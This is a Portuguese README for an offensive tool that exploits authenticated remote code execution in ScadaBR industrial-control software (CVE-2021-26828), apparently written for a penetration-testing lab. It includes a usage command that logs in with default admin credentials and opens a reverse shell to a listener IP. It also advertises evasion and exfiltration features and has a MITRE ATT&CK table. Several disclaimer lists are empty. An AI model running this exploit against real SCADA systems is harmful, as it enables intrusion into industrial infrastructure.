
ScadaFlare Framework de Exploração de RCE Autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Um exploit modular de RCE pós-autenticação voltado para ScadaBR <1.1.0, aprimorado para operações de red team.

.jsp armamentizada via view_edit.shtmEste exploit foi desenvolvido durante a análise do cenário HTB Pro Lab: Alchemy. O PoC original de Fellipe Oliveira era sólido, mas:
Escrito em Python 2
Não tinha recursos modernos como suporte a proxy, limpeza de shell e encadeamento de enumeração
Era difícil de estender ou integrar a fluxos de trabalho de red team
Esta versão, ScadaFlare, é uma reescrita completa em Python 3 com suporte modular, múltiplas estratégias de evasão, substituição de detecção de SO, integração com webhook, suporte a proxy SOCKS e cadeias de enumeração para uso por operadores no mundo real.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare foi projetado exclusivamente para:
O uso não autorizado contra sistemas industriais reais pode:
Ao usar esta ferramenta, você aceita total responsabilidade por:
Licença MIT – consulte LICENSE
| Fase | Técnica | ID |
|---|
| Acesso Inicial (pós-autenticação) | Contas Válidas | T1078 |
| Execução | Explorar Aplicativo Exposto Publicamente | T1190 |
| Execução de Comandos | Web Shell | T1505.003 |
| Ações de Privilégio | Modificar Conteúdo Web | T1505 |
| Acesso a Credenciais | Credencial em Arquivos de Configuração | T1552.001 |
| Descoberta | Descoberta de Sistema Remoto | T1018 |
| Exfiltração | Exfiltração Via Serviço Web | T1567.002 |
| Evasão de Defesa | Tunelamento de Proxy e Protocolo | T1090 |